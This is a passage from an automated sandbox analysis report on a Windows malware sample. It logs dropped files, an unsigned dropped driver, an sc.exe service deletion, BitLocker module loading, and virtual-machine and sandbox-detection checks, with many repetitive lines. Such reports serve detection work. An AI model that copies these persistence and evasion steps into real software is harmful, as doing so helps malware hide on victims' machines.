              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: 4o8Tgrb384.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: 4o8Tgrb384.exeStatic file information: File size 2629632 > 1048576
              Source: 4o8Tgrb384.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x277a00
              Source: 4o8Tgrb384.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: atpljrtdlbzl.exe, 00000018.00000003.1489405738.000001EB643A0000.00000004.00000001.00020000.00000000.sdmp
              Source: 4o8Tgrb384.exeStatic PE information: section name: .00cfg
              Source: atpljrtdlbzl.exe.0.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeCode function: 0_2_00007FF67C751394 push qword ptr [00007FF67C75B004h]; ret 0_2_00007FF67C751403
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeCode function: 24_2_00007FF62D5F1394 push qword ptr [00007FF62D5FB004h]; ret 24_2_00007FF62D5F1403
              Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000000140001394 push qword ptr [0000000140009004h]; ret 37_2_0000000140001403

              Persistence and Installation Behavior

              barindex
              Sample is not signed and drops a device driver
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeFile created: C:\Windows\TEMP\iwttnaazwiuc.sysJump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeFile created: C:\Windows\Temp\iwttnaazwiuc.sysJump to dropped file
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeFile created: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeJump to dropped file
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeFile created: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeJump to dropped file
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeFile created: C:\Windows\Temp\iwttnaazwiuc.sysJump to dropped file
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "QVYJPHJR"

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
              Source: svchost.exe, 00000027.00000002.2670167237.000001B0C382F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEXE
